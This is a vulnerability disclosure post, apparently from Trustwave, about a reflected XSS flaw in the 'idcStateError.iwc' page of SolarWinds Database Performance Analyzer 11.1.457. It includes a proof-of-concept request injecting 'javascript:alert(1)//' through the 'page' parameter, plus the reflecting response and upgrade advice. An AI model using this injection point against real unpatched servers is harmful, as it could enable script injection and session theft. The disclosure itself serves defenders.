Trustwave's 2024 Retail Report Series Highlights Alarming E-Commerce Threats and Growing Fraud Against Retailers. Learn More
Get access to immediate incident response assistance.
Get access to immediate incident response assistance.
Trustwave's 2024 Retail Report Series Highlights Alarming E-Commerce Threats and Growing Fraud Against Retailers. Learn More
Just a short post from me today, bringing you a pretty simple Cross-Site Scripting (XSS) issue. In version 11.1.457 of SolarWinds, there is a Reflected Cross-Site Scripting vulnerability in the 'idcStateError.iwc' error page. This has been addressed in version 12.1. However, versions below 11.1.457 may also be vulnerable, as it is unknown when the vulnerability was introduced.
The following HTTP Request and response show how the issue is triggered and the results:
http://192.168.1.101:8123/iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f
Request:
GET /iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f HTTP/1.1
Host: 172.16.4.104:8123
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://172.16.4.104:8123/iwc/login.iwc
Cookie: JSESSIONID=112A2A7B2EA72FA03B4157A557CE93D9
Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 19 Nov 2018 18:46:00 GMT
Connection: close
Content-Length: 6531
[...]
<a href="javascript:alert(1)//" class="btn btn-primary">
[...]
Figure 1: Pop-up due to Cross-Site Scripting (XSS)
Users of SolarWinds Database Performance Analyzer should upgrade to version 12.1 to remediate this issue.
For more information, please see our advisory: TWSL2019-002
This post was originally published on my personal Greenwolf Security blog.
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.
Copyright © 2024 Trustwave Holdings, Inc. All rights reserved.